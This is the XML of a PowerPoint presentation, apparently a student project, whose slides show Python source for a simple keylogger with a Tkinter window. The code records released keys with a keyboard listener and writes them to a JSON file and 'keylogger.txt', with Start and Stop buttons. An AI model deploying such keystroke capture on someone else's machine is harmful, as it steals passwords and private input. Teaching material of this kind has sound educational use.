                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(key):</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global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>, keys</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(</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{'Released': f'{key}'}</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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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if flag == True:</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flag = False</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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keys = keys + str(key)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>():</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global listener</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="18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2684916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B3B9BB"/>
              <a:srgbClr val="FFFFFF"/>
            </a:duotone>
          </a:blip>
          <a:stretch/>
        </a:blip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533400" y="1219200"/>
            <a:ext cx="10681335" cy="4431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0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(state='disabled')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>():</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    global listener</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>()</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(state='normal')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:b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root = Tk()</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root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Lucida Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="685183588"/>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
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface=""/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="Parallax">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Mandavalli manikantha</dc:title>
  <dc:creator>Mallika</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-24T02:31:05Z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2024-06-02T16:00:00Z</vt:filetime>
  </property>
</Properties>
</file>